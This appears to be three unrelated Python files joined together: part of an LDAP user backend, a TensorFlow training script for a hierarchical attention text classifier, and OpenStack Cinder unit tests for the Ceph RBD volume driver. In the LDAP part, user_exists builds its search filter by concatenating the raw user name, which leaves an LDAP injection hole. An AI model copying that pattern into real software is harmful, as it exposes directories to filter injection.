def remove_user_from_all_groups(self, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.user_exists(user):
raise UserNotFoundError
for group in self.get_groups():
self.remove_group_member(group.get(GroupBackend.FIELD_PK), user)
def set_user_password(self, user, password, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.user_exists(user):
raise UserNotFoundError
dn = self.get_full_user_dn(user)
mod_attrs = [
(ldap.MOD_REPLACE, 'userpassword', str(self.encrypt_password(password)))
]
try:
self.cnx.modify_s(str(dn), mod_attrs)
except ldap.NO_SUCH_OBJECT as ex:
raise UserNotFoundError(ex)
except Exception as ex:
raise UserBackendError(ex)
def user_exists(self, user):
"""
:inherit.
"""
base = self.get_full_dn(self.users_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + user
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
return len(result) != 0
except ldap.NO_SUCH_OBJECT as ex:
return False
except Exception as ex:
raise UserBackendError(ex)
| |
#!/usr/bin/env python3
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--task', default='yelp', choices=['yelp'])
parser.add_argument('--mode', default='train', choices=['train', 'eval'])
parser.add_argument('--checkpoint-frequency', type=int, default=100)
parser.add_argument('--eval-frequency', type=int, default=10000)
parser.add_argument('--batch-size', type=int, default=30)
parser.add_argument("--device", default="/cpu:0")
parser.add_argument("--max-grad-norm", type=float, default=5.0)
parser.add_argument("--lr", type=float, default=0.001)
args = parser.parse_args()
import importlib
import os
import pickle
import random
import time
from collections import Counter, defaultdict
import numpy as np
import pandas as pd
import spacy
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
from tqdm import tqdm
import ujson
from data_util import batch
task_name = args.task
task = importlib.import_module(task_name)
checkpoint_dir = os.path.join(task.train_dir, 'checkpoint')
tflog_dir = os.path.join(task.train_dir, 'tflog')
checkpoint_name = task_name + '-model'
checkpoint_dir = os.path.join(task.train_dir, 'checkpoints')
checkpoint_path = os.path.join(checkpoint_dir, checkpoint_name)
# @TODO: move calculation into `task file`
trainset = task.read_trainset(epochs=1)
class_weights = pd.Series(Counter([l for _, l in trainset]))
class_weights = 1/(class_weights/class_weights.mean())
class_weights = class_weights.to_dict()
vocab = task.read_vocab()
labels = task.read_labels()
classes = max(labels.values())+1
vocab_size = task.vocab_size
labels_rev = {int(v): k for k, v in labels.items()}
vocab_rev = {int(v): k for k, v in vocab.items()}
def HAN_model_1(session, restore_only=False):
"""Hierarhical Attention Network"""
import tensorflow as tf
try:
from tensorflow.contrib.rnn import GRUCell, MultiRNNCell, DropoutWrapper
except ImportError:
MultiRNNCell = tf.nn.rnn_cell.MultiRNNCell
GRUCell = tf.nn.rnn_cell.GRUCell
from bn_lstm import BNLSTMCell
from HAN_model import HANClassifierModel
is_training = tf.placeholder(dtype=tf.bool, name='is_training')
cell = BNLSTMCell(80, is_training) # h-h batchnorm LSTMCell
# cell = GRUCell(30)
cell = MultiRNNCell([cell]*5)
model = HANClassifierModel(
vocab_size=vocab_size,
embedding_size=200,
classes=classes,
word_cell=cell,
sentence_cell=cell,
word_output_size=100,
sentence_output_size=100,
device=args.device,
learning_rate=args.lr,
max_grad_norm=args.max_grad_norm,
dropout_keep_proba=0.5,
is_training=is_training,
)
saver = tf.train.Saver(tf.global_variables())
checkpoint = tf.train.get_checkpoint_state(checkpoint_dir)
if checkpoint:
print("Reading model parameters from %s" % checkpoint.model_checkpoint_path)
saver.restore(session, checkpoint.model_checkpoint_path)
elif restore_only:
raise FileNotFoundError("Cannot restore model")
else:
print("Created model with fresh parameters")
session.run(tf.global_variables_initializer())
# tf.get_default_graph().finalize()
return model, saver
model_fn = HAN_model_1
def decode(ex):
print('text: ' + '\n'.join([' '.join([vocab_rev.get(wid, '<?>') for wid in sent]) for sent in ex[0]]))
print('label: ', labels_rev[ex[1]])
print('data loaded')
def batch_iterator(dataset, batch_size, max_epochs):
for i in range(max_epochs):
xb = []
yb = []
for ex in dataset:
x, y = ex
xb.append(x)
yb.append(y)
if len(xb) == batch_size:
yield xb, yb
xb, yb = [], []
def ev(session, model, dataset):
predictions = []
labels = []
examples = []
for x, y in tqdm(batch_iterator(dataset, args.batch_size, 1)):
examples.extend(x)
labels.extend(y)
predictions.extend(session.run(model.prediction, model.get_feed_data(x, is_training=False)))
df = pd.DataFrame({'predictions': predictions, 'labels': labels, 'examples': examples})
return df
def evaluate(dataset):
tf.reset_default_graph()
config = tf.ConfigProto(allow_soft_placement=True)
with tf.Session(config=config) as s:
model, _ = model_fn(s, restore_only=True)
df = ev(s, model, dataset)
print((df['predictions'] == df['labels']).mean())
import IPython
IPython.embed()
def train():
tf.reset_default_graph()
config = tf.ConfigProto(allow_soft_placement=True)
with tf.Session(config=config) as s:
model, saver = model_fn(s)
summary_writer = tf.summary.FileWriter(tflog_dir, graph=tf.get_default_graph())
# Format: tensorflow/contrib/tensorboard/plugins/projector/projector_config.proto
# pconf = projector.ProjectorConfig()
# # You can add multiple embeddings. Here we add only one.
# embedding = pconf.embeddings.add()
# embedding.tensor_name = m.embedding_matrix.name
# # Link this tensor to its metadata file (e.g. labels).
# embedding.metadata_path = vocab_tsv
# print(embedding.tensor_name)
# Saves a configuration file that TensorBoard will read during startup.
for i, (x, y) in enumerate(batch_iterator(task.read_trainset(epochs=3), args.batch_size, 300)):
fd = model.get_feed_data(x, y, class_weights=class_weights)
# import IPython
# IPython.embed()
t0 = time.clock()
step, summaries, loss, accuracy, _ = s.run([
model.global_step,
model.summary_op,
model.loss,
model.accuracy,
model.train_op,
], fd)
td = time.clock() - t0
summary_writer.add_summary(summaries, global_step=step)
# projector.visualize_embeddings(summary_writer, pconf)
if step % 1 == 0:
print('step %s, loss=%s, accuracy=%s, t=%s, inputs=%s' % (step, loss, accuracy, round(td, 2), fd[model.inputs].shape))
if step != 0 and step % args.checkpoint_frequency == 0:
print('checkpoint & graph meta')
saver.save(s, checkpoint_path, global_step=step)
print('checkpoint done')
if step != 0 and step % args.eval_frequency == 0:
print('evaluation at step %s' % i)
dev_df = ev(s, model, task.read_devset(epochs=1))
print('dev accuracy: %.2f' % (dev_df['predictions'] == dev_df['labels']).mean())
def main():
if args.mode == 'train':
train()
elif args.mode == 'eval':
evaluate(task.read_devset(epochs=1))
if __name__ == '__main__':
main()
| |
# Copyright 2012 Josh Durgin
# Copyright 2013 Canonical Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import os
import tempfile
import mock
from cinder import db
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder.openstack.common import log as logging
from cinder.openstack.common import timeutils
from cinder.openstack.common import units
from cinder import test
from cinder.tests.image import fake as fake_image
from cinder.tests.test_volume import DriverTestCase
from cinder.volume import configuration as conf
import cinder.volume.drivers.rbd as driver
from cinder.volume.flows.manager import create_volume
LOG = logging.getLogger(__name__)
# This is used to collect raised exceptions so that tests may check what was
# raised.
# NOTE: this must be initialised in test setUp().
RAISED_EXCEPTIONS = []
class MockException(Exception):
def __init__(self, *args, **kwargs):
RAISED_EXCEPTIONS.append(self.__class__)
class MockImageNotFoundException(MockException):
"""Used as mock for rbd.ImageNotFound."""
class MockImageBusyException(MockException):
"""Used as mock for rbd.ImageBusy."""
class MockImageExistsException(MockException):
"""Used as mock for rbd.ImageExists."""
def common_mocks(f):
"""Decorator to set mocks common to all tests.
The point of doing these mocks here is so that we don't accidentally set
mocks that can't/don't get unset.
"""
def _common_inner_inner1(inst, *args, **kwargs):
@mock.patch('cinder.volume.drivers.rbd.RBDVolumeProxy')
@mock.patch('cinder.volume.drivers.rbd.RADOSClient')
@mock.patch('cinder.backup.drivers.ceph.rbd')
@mock.patch('cinder.backup.drivers.ceph.rados')
def _common_inner_inner2(mock_rados, mock_rbd, mock_client,
mock_proxy):
inst.mock_rbd = mock_rbd
inst.mock_rados = mock_rados
inst.mock_client = mock_client
inst.mock_proxy = mock_proxy
inst.mock_rados.Rados = mock.Mock
inst.mock_rados.Rados.ioctx = mock.Mock()
inst.mock_rbd.RBD = mock.Mock
inst.mock_rbd.Image = mock.Mock
inst.mock_rbd.Image.close = mock.Mock()
inst.mock_rbd.RBD.Error = Exception
inst.mock_rados.Error = Exception
inst.mock_rbd.ImageBusy = MockImageBusyException
inst.mock_rbd.ImageNotFound = MockImageNotFoundException
inst.mock_rbd.ImageExists = MockImageExistsException
inst.driver.rbd = inst.mock_rbd
inst.driver.rados = inst.mock_rados
return f(inst, *args, **kwargs)
return _common_inner_inner2()
return _common_inner_inner1
CEPH_MON_DUMP = """dumped monmap epoch 1
{ "epoch": 1,
"fsid": "33630410-6d93-4d66-8e42-3b953cf194aa",
"modified": "2013-05-22 17:44:56.343618",
"created": "2013-05-22 17:44:56.343618",
"mons": [
{ "rank": 0,
"name": "a",
"addr": "[::1]:6789\/0"},
{ "rank": 1,
"name": "b",
"addr": "[::1]:6790\/0"},
{ "rank": 2,
"name": "c",
"addr": "[::1]:6791\/0"},
{ "rank": 3,
"name": "d",
"addr": "127.0.0.1:6792\/0"},
{ "rank": 4,
"name": "e",
"addr": "example.com:6791\/0"}],
"quorum": [
0,
1,
2]}
"""
class RBDTestCase(test.TestCase):
def setUp(self):
global RAISED_EXCEPTIONS
RAISED_EXCEPTIONS = []
super(RBDTestCase, self).setUp()
self.cfg = mock.Mock(spec=conf.Configuration)
self.cfg.volume_tmp_dir = None
self.cfg.rbd_pool = 'rbd'
self.cfg.rbd_ceph_conf = None
self.cfg.rbd_secret_uuid = None
self.cfg.rbd_user = None
self.cfg.volume_dd_blocksize = '1M'
self.cfg.rbd_store_chunk_size = 4
mock_exec = mock.Mock()
mock_exec.return_value = ('', '')
self.driver = driver.RBDDriver(execute=mock_exec,
configuration=self.cfg)
self.driver.set_initialized()
self.volume_name = u'volume-00000001'
self.snapshot_name = u'snapshot-00000001'
self.volume_size = 1
self.volume = dict(name=self.volume_name, size=self.volume_size)
self.snapshot = dict(volume_name=self.volume_name,
name=self.snapshot_name)
@common_mocks
def test_create_volume(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
with mock.patch.object(self.driver, '_supports_layering') as \
mock_supports_layering:
mock_supports_layering.return_value = True
self.mock_rbd.RBD.create = mock.Mock()
self.driver.create_volume(self.volume)
chunk_size = self.cfg.rbd_store_chunk_size * units.Mi
order = int(math.log(chunk_size, 2))
args = [client.ioctx, str(self.volume_name),
self.volume_size * units.Gi, order]
kwargs = {'old_format': False,
'features': self.mock_rbd.RBD_FEATURE_LAYERING}
self.mock_rbd.RBD.create.assert_called_once_with(*args, **kwargs)
client.__enter__.assert_called_once()
client.__exit__.assert_called_once()
mock_supports_layering.assert_called_once()
@common_mocks
def test_manage_existing_get_size(self):
with mock.patch.object(self.driver.rbd.Image, 'size') as \
mock_rbd_image_size:
with mock.patch.object(self.driver.rbd.Image, 'close') \
as mock_rbd_image_close:
mock_rbd_image_size.return_value = 2 * units.Gi
existing_ref = {'source-name': self.volume_name}
return_size = self.driver.manage_existing_get_size(
self.volume,
existing_ref)
self.assertEqual(2, return_size)
mock_rbd_image_size.assert_called_once_with()
mock_rbd_image_close.assert_called_once_with()
@common_mocks
def test_manage_existing_get_invalid_size(self):
with mock.patch.object(self.driver.rbd.Image, 'size') as \
mock_rbd_image_size:
with mock.patch.object(self.driver.rbd.Image, 'close') \
as mock_rbd_image_close:
mock_rbd_image_size.return_value = 'abcd'
existing_ref = {'source-name': self.volume_name}
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.manage_existing_get_size,
self.volume, existing_ref)
mock_rbd_image_size.assert_called_once_with()
mock_rbd_image_close.assert_called_once_with()
@common_mocks
def test_manage_existing(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
with mock.patch.object(driver, 'RADOSClient') as mock_rados_client:
with mock.patch.object(self.driver.rbd.RBD(), 'rename') as \
mock_rbd_image_rename:
exist_volume = 'vol-exist'
existing_ref = {'source-name': exist_volume}
mock_rbd_image_rename.return_value = 0
mock_rbd_image_rename(mock_rados_client.ioctx,
exist_volume,
self.volume_name)
self.driver.manage_existing(self.volume, existing_ref)
mock_rbd_image_rename.assert_called_with(
mock_rados_client.ioctx,
exist_volume,
self.volume_name)
@common_mocks
def test_manage_existing_with_exist_rbd_image(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
self.mock_rbd.Image.rename = mock.Mock()
self.mock_rbd.Image.rename.side_effect = \
MockImageExistsException
exist_volume = 'vol-exist'
existing_ref = {'source-name': exist_volume}
self.assertRaises(self.mock_rbd.ImageExists,
self.driver.manage_existing,
self.volume, existing_ref)
#make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS,
[self.mock_rbd.ImageExists])
@common_mocks
def test_create_volume_no_layering(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
with mock.patch.object(self.driver, '_supports_layering') as \
mock_supports_layering:
mock_supports_layering.return_value = False
self.mock_rbd.RBD.create = mock.Mock()
self.driver.create_volume(self.volume)
chunk_size = self.cfg.rbd_store_chunk_size * units.Mi
order = int(math.log(chunk_size, 2))
args = [client.ioctx, str(self.volume_name),
self.volume_size * units.Gi, order]
kwargs = {'old_format': True,
'features': 0}
self.mock_rbd.RBD.create.assert_called_once_with(*args, **kwargs)
client.__enter__.assert_called_once()
client.__exit__.assert_called_once()
mock_supports_layering.assert_called_once()
@common_mocks
def test_delete_backup_snaps(self):
self.driver.rbd.Image.remove_snap = mock.Mock()
with mock.patch.object(self.driver, '_get_backup_snaps') as \
mock_get_backup_snaps:
mock_get_backup_snaps.return_value = [{'name': 'snap1'}]
rbd_image = self.driver.rbd.Image()
self.driver._delete_backup_snaps(rbd_image)
mock_get_backup_snaps.assert_called_once_with(rbd_image)
self.assertTrue(self.driver.rbd.Image.remove_snap.called)
@common_mocks
def test_delete_volume(self):
client = self.mock_client.return_value
self.driver.rbd.Image.list_snaps = mock.Mock()
self.driver.rbd.Image.list_snaps.return_value = []
self.driver.rbd.Image.close = mock.Mock()
self.driver.rbd.Image.remove = mock.Mock()
self.driver.rbd.Image.unprotect_snap = mock.Mock()
with mock.patch.object(self.driver, '_get_clone_info') as \
mock_get_clone_info:
with mock.patch.object(self.driver, '_delete_backup_snaps') as \
mock_delete_backup_snaps:
mock_get_clone_info.return_value = (None, None, None)
self.driver.delete_volume(self.volume)
mock_get_clone_info.assert_called_once()
self.driver.rbd.Image.list_snaps.assert_called_once()
client.__enter__.assert_called_once()
client.__exit__.assert_called_once()
mock_delete_backup_snaps.assert_called_once()
self.assertFalse(self.driver.rbd.Image.unprotect_snap.called)
self.driver.rbd.RBD.remove.assert_called_once()
@common_mocks
def delete_volume_not_found(self):
self.mock_rbd.Image.side_effect = self.mock_rbd.ImageNotFound
self.assertIsNone(self.driver.delete_volume(self.volume))
self.mock_rbd.Image.assert_called_once()
# Make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS, [self.mock_rbd.ImageNotFound])
@common_mocks
def test_delete_busy_volume(self):
self.mock_rbd.Image.list_snaps = mock.Mock()
self.mock_rbd.Image.list_snaps.return_value = []
self.mock_rbd.Image.unprotect_snap = mock.Mock()
self.mock_rbd.RBD.remove = mock.Mock()
self.mock_rbd.RBD.remove.side_effect = self.mock_rbd.ImageBusy
with mock.patch.object(self.driver, '_get_clone_info') as \
mock_get_clone_info:
mock_get_clone_info.return_value = (None, None, None)
with mock.patch.object(self.driver, '_delete_backup_snaps') as \
mock_delete_backup_snaps:
with mock.patch.object(driver, 'RADOSClient') as \
mock_rados_client:
self.assertRaises(exception.VolumeIsBusy,
self.driver.delete_volume, self.volume)
mock_get_clone_info.assert_called_once()
self.mock_rbd.Image.list_snaps.assert_called_once()
mock_rados_client.assert_called_once()
mock_delete_backup_snaps.assert_called_once()
self.assertFalse(self.mock_rbd.Image.unprotect_snap.called)
self.mock_rbd.RBD.remove.assert_called_once()
# Make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS,
[self.mock_rbd.ImageBusy])
@common_mocks
def test_create_snapshot(self):
proxy = self.mock_proxy.return_value
proxy.__enter__.return_value = proxy
self.driver.create_snapshot(self.snapshot)
args = [str(self.snapshot_name)]
proxy.create_snap.assert_called_with(*args)
proxy.protect_snap.assert_called_with(*args)
@common_mocks
def test_delete_snapshot(self):
proxy = self.mock_proxy.return_value
proxy.__enter__.return_value = proxy
self.driver.delete_snapshot(self.snapshot)
args = [str(self.snapshot_name)]
proxy.remove_snap.assert_called_with(*args)
proxy.unprotect_snap.assert_called_with(*args)
@common_mocks
def test_get_clone_info(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
parent_info = ('a', 'b', '%s.clone_snap' % (self.volume_name))
volume.parent_info.return_value = parent_info
info = self.driver._get_clone_info(volume, self.volume_name)
self.assertEqual(info, parent_info)
self.assertFalse(volume.set_snap.called)
volume.parent_info.assert_called_once()
@common_mocks
def test_get_clone_info_w_snap(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
parent_info = ('a', 'b', '%s.clone_snap' % (self.volume_name))
volume.parent_info.return_value = parent_info
snapshot = self.mock_rbd.ImageSnapshot()
info = self.driver._get_clone_info(volume, self.volume_name,
snap=snapshot)
self.assertEqual(info, parent_info)
volume.set_snap.assert_called_once()
self.assertEqual(volume.set_snap.call_count, 2)
volume.parent_info.assert_called_once()
@common_mocks
def test_get_clone_info_w_exception(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
volume.parent_info.side_effect = self.mock_rbd.ImageNotFound
snapshot = self.mock_rbd.ImageSnapshot()
info = self.driver._get_clone_info(volume, self.volume_name,
snap=snapshot)
self.assertEqual(info, (None, None, None))
volume.set_snap.assert_called_once()
self.assertEqual(volume.set_snap.call_count, 2)
volume.parent_info.assert_called_once()
# Make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS, [self.mock_rbd.ImageNotFound])
@common_mocks
def test_get_clone_info_deleted_volume(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
parent_info = ('a', 'b', '%s.clone_snap' % (self.volume_name))
volume.parent_info.return_value = parent_info
info = self.driver._get_clone_info(volume,
"%s.deleted" % (self.volume_name))
self.assertEqual(info, parent_info)
self.assertFalse(volume.set_snap.called)
volume.parent_info.assert_called_once()
@common_mocks
def test_create_cloned_volume(self):
src_name = u'volume-00000001'
dst_name = u'volume-00000002'
self.cfg.rbd_max_clone_depth = 2
self.mock_rbd.RBD.clone = mock.Mock()
with mock.patch.object(self.driver, '_get_clone_depth') as \
mock_get_clone_depth:
# Try with no flatten required
mock_get_clone_depth.return_value = 1
self.mock_rbd.Image.create_snap = mock.Mock()
self.mock_rbd.Image.protect_snap = mock.Mock()
self.mock_rbd.Image.close = mock.Mock()
self.driver.create_cloned_volume(dict(name=dst_name),
dict(name=src_name))
self.mock_rbd.Image.create_snap.assert_called_once()
self.mock_rbd.Image.protect_snap.assert_called_once()
self.mock_rbd.RBD.clone.assert_called_once()
self.mock_rbd.Image.close.assert_called_once()
self.assertTrue(mock_get_clone_depth.called)
@common_mocks
def test_create_cloned_volume_w_flatten(self):
src_name = u'volume-00000001'
dst_name = u'volume-00000002'
self.cfg.rbd_max_clone_depth = 1
self.mock_rbd.RBD.clone = mock.Mock()
self.mock_rbd.RBD.clone.side_effect = self.mock_rbd.RBD.Error
with mock.patch.object(self.driver, '_get_clone_depth') as \
mock_get_clone_depth:
# Try with no flatten required
mock_get_clone_depth.return_value = 1
self.mock_rbd.Image.create_snap = mock.Mock()
self.mock_rbd.Image.protect_snap = mock.Mock()
self.mock_rbd.Image.unprotect_snap = mock.Mock()
self.mock_rbd.Image.remove_snap = mock.Mock()
self.mock_rbd.Image.close = mock.Mock()
self.assertRaises(self.mock_rbd.RBD.Error,
self.driver.create_cloned_volume,
dict(name=dst_name), dict(name=src_name))
self.mock_rbd.Image.create_snap.assert_called_once()
self.mock_rbd.Image.protect_snap.assert_called_once()
self.mock_rbd.RBD.clone.assert_called_once()
self.mock_rbd.Image.unprotect_snap.assert_called_once()
self.mock_rbd.Image.remove_snap.assert_called_once()
self.mock_rbd.Image.close.assert_called_once()
self.assertTrue(mock_get_clone_depth.called)
@common_mocks
def test_create_cloned_volume_w_clone_exception(self):
src_name = u'volume-00000001'
dst_name = u'volume-00000002'
self.cfg.rbd_max_clone_depth = 2
self.mock_rbd.RBD.clone = mock.Mock()
self.mock_rbd.RBD.clone.side_effect = self.mock_rbd.RBD.Error
with mock.patch.object(self.driver, '_get_clone_depth') as \
mock_get_clone_depth:
# Try with no flatten required
mock_get_clone_depth.return_value = 1
self.mock_rbd.Image.create_snap = mock.Mock()
self.mock_rbd.Image.protect_snap = mock.Mock()
self.mock_rbd.Image.unprotect_snap = mock.Mock()
self.mock_rbd.Image.remove_snap = mock.Mock()
self.mock_rbd.Image.close = mock.Mock()
self.assertRaises(self.mock_rbd.RBD.Error,
self.driver.create_cloned_volume,
dict(name=dst_name), dict(name=src_name))
self.mock_rbd.Image.create_snap.assert_called_once()
self.mock_rbd.Image.protect_snap.assert_called_once()
self.mock_rbd.RBD.clone.assert_called_once()
self.mock_rbd.Image.unprotect_snap.assert_called_once()
self.mock_rbd.Image.remove_snap.assert_called_once()
self.mock_rbd.Image.close.assert_called_once()
@common_mocks
def test_good_locations(self):
locations = ['rbd://fsid/pool/image/snap',
'rbd://%2F/%2F/%2F/%2F', ]
map(self.driver._parse_location, locations)
@common_mocks
def test_bad_locations(self):
locations = ['rbd://image',
'http://path/to/somewhere/else',
'rbd://image/extra',
'rbd://image/',
'rbd://fsid/pool/image/',
'rbd://fsid/pool/image/snap/',
'rbd://///', ]
for loc in locations:
self.assertRaises(exception.ImageUnacceptable,
self.driver._parse_location,
loc)
self.assertFalse(
self.driver._is_cloneable(loc, {'disk_format': 'raw'}))
@common_mocks
def test_cloneable(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://abc/pool/image/snap'
info = {'disk_format': 'raw'}
self.assertTrue(self.driver._is_cloneable(location, info))
self.assertTrue(mock_get_fsid.called)
@common_mocks
def test_uncloneable_different_fsid(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://def/pool/image/snap'
self.assertFalse(
self.driver._is_cloneable(location, {'disk_format': 'raw'}))
self.assertTrue(mock_get_fsid.called)
@common_mocks
def test_uncloneable_unreadable(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://abc/pool/image/snap'
self.mock_proxy.side_effect = self.mock_rbd.Error
args = [location, {'disk_format': 'raw'}]
self.assertFalse(self.driver._is_cloneable(*args))
self.mock_proxy.assert_called_once()
self.assertTrue(mock_get_fsid.called)
@common_mocks
def test_uncloneable_bad_format(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://abc/pool/image/snap'
formats = ['qcow2', 'vmdk', 'vdi']
for f in formats:
self.assertFalse(
self.driver._is_cloneable(location, {'disk_format': f}))
self.assertTrue(mock_get_fsid.called)
def _copy_image(self):
with mock.patch.object(tempfile, 'NamedTemporaryFile'):
with mock.patch.object(os.path, 'exists') as mock_exists:
mock_exists.return_value = True
with mock.patch.object(image_utils, 'fetch_to_raw'):
with mock.patch.object(self.driver, 'delete_volume'):
with mock.patch.object(self.driver, '_resize'):
mock_image_service = mock.MagicMock()
args = [None, {'name': 'test', 'size': 1},
mock_image_service, None]
self.driver.copy_image_to_volume(*args)
@common_mocks
def test_copy_image_no_volume_tmp(self):
self.cfg.volume_tmp_dir = None
self._copy_image()
@common_mocks
def test_copy_image_volume_tmp(self):
self.cfg.volume_tmp_dir = '/var/run/cinder/tmp'
self._copy_image()
@common_mocks
def test_update_volume_stats(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
client.cluster = mock.Mock()
client.cluster.get_cluster_stats = mock.Mock()
client.cluster.get_cluster_stats.return_value = {'kb': 1024 ** 3,
'kb_avail': 1024 ** 2}
self.driver.configuration.safe_get = mock.Mock()
self.driver.configuration.safe_get.return_value = 'RBD'
expected = dict(
volume_backend_name='RBD',
vendor_name='Open Source',
driver_version=self.driver.VERSION,
storage_protocol='ceph',
total_capacity_gb=1024,
free_capacity_gb=1,
reserved_percentage=0)
actual = self.driver.get_volume_stats(True)
client.cluster.get_cluster_stats.assert_called_once()
self.assertDictMatch(expected, actual)
@common_mocks
def test_update_volume_stats_error(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
client.cluster = mock.Mock()
client.cluster.get_cluster_stats = mock.Mock()
client.cluster.get_cluster_stats.side_effect = Exception
self.driver.configuration.safe_get = mock.Mock()
self.driver.configuration.safe_get.return_value = 'RBD'
expected = dict(volume_backend_name='RBD',
vendor_name='Open Source',
driver_version=self.driver.VERSION,
storage_protocol='ceph',
total_capacity_gb='unknown',
free_capacity_gb='unknown',
reserved_percentage=0)
actual = self.driver.get_volume_stats(True)
client.cluster.get_cluster_stats.assert_called_once()
self.assertDictMatch(expected, actual)
@common_mocks
def test_get_mon_addrs(self):
with mock.patch.object(self.driver, '_execute') as mock_execute:
mock_execute.return_value = (CEPH_MON_DUMP, '')
hosts = ['::1', '::1', '::1', '127.0.0.1', 'example.com']
ports = ['6789', '6790', '6791', '6792', '6791']
self.assertEqual((hosts, ports), self.driver._get_mon_addrs())
@common_mocks
def test_initialize_connection(self):
hosts = ['::1', '::1', '::1', '127.0.0.1', 'example.com']
ports = ['6789', '6790', '6791', '6792', '6791']
with mock.patch.object(self.driver, '_get_mon_addrs') as \
mock_get_mon_addrs:
mock_get_mon_addrs.return_value = (hosts, ports)
expected = {
'driver_volume_type': 'rbd',
'data': {
'name': '%s/%s' % (self.cfg.rbd_pool,
self.volume_name),
'hosts': hosts,
'ports': ports,
'auth_enabled': False,
'auth_username': None,
'secret_type': 'ceph',
'secret_uuid': None, }
}
volume = dict(name=self.volume_name)
actual = self.driver.initialize_connection(volume, None)
self.assertDictMatch(expected, actual)
self.assertTrue(mock_get_mon_addrs.called)
@common_mocks
def test_clone(self):
src_pool = u'images'
src_image = u'image-name'
src_snap = u'snapshot-name'
client_stack = []
def mock__enter__(inst):
def _inner():
client_stack.append(inst)
return inst
return _inner
client = self.mock_client.return_value
# capture both rados client used to perform the clone
client.__enter__.side_effect = mock__enter__(client)
self.mock_rbd.RBD.clone = mock.Mock()
self.driver._clone(self.volume, src_pool, src_image, src_snap)
args = [client_stack[0].ioctx, str(src_image), str(src_snap),
client_stack[1].ioctx, str(self.volume_name)]
kwargs = {'features': self.mock_rbd.RBD_FEATURE_LAYERING}
self.mock_rbd.RBD.clone.assert_called_once_with(*args, **kwargs)
self.assertEqual(client.__enter__.call_count, 2)
@common_mocks
def test_extend_volume(self):
fake_size = '20'
fake_vol = {'project_id': 'testprjid', 'name': self.volume_name,
'size': fake_size,
'id': 'a720b3c0-d1f0-11e1-9b23-0800200c9a66'}
self.mox.StubOutWithMock(self.driver, '_resize')
size = int(fake_size) * units.Gi
self.driver._resize(fake_vol, size=size)
self.mox.ReplayAll()
self.driver.extend_volume(fake_vol, fake_size)
self.mox.VerifyAll()
@common_mocks
def test_rbd_volume_proxy_init(self):
snap = u'snapshot-name'
client = self.mock_client.return_value
client.__enter__.return_value = client
with mock.patch.object(self.driver, '_connect_to_rados') as \
mock_connect_from_rados:
with mock.patch.object(self.driver, '_disconnect_from_rados') as \
mock_disconnect_from_rados:
mock_connect_from_rados.return_value = (None, None)
mock_disconnect_from_rados.return_value = (None, None)
with driver.RBDVolumeProxy(self.driver, self.volume_name):
mock_connect_from_rados.assert_called_once()
self.assertFalse(mock_disconnect_from_rados.called)
mock_disconnect_from_rados.assert_called_once()
mock_connect_from_rados.reset_mock()
mock_disconnect_from_rados.reset_mock()
with driver.RBDVolumeProxy(self.driver, self.volume_name,
snapshot=snap):
mock_connect_from_rados.assert_called_once()
self.assertFalse(mock_disconnect_from_rados.called)
mock_disconnect_from_rados.assert_called_once()
@common_mocks
def test_connect_to_rados(self):
# Default
self.cfg.rados_connect_timeout = -1
self.mock_rados.Rados.connect = mock.Mock()
self.mock_rados.Rados.shutdown = mock.Mock()
self.mock_rados.Rados.open_ioctx = mock.Mock()
self.mock_rados.Rados.open_ioctx.return_value = \
self.mock_rados.Rados.ioctx
# default configured pool
ret = self.driver._connect_to_rados()
self.assertTrue(self.mock_rados.Rados.connect.called)
# Expect no timeout if default is used
self.mock_rados.Rados.connect.assert_called_once_with()
self.assertTrue(self.mock_rados.Rados.open_ioctx.called)
self.assertIsInstance(ret[0], self.mock_rados.Rados)
self.assertEqual(ret[1], self.mock_rados.Rados.ioctx)
self.mock_rados.Rados.open_ioctx.assert_called_with(self.cfg.rbd_pool)
# different pool
ret = self.driver._connect_to_rados('alt_pool')
self.assertTrue(self.mock_rados.Rados.connect.called)
self.assertTrue(self.mock_rados.Rados.open_ioctx.called)
self.assertIsInstance(ret[0], self.mock_rados.Rados)
self.assertEqual(ret[1], self.mock_rados.Rados.ioctx)
self.mock_rados.Rados.open_ioctx.assert_called_with('alt_pool')
# With timeout
self.cfg.rados_connect_timeout = 1
self.mock_rados.Rados.connect.reset_mock()
self.driver._connect_to_rados()
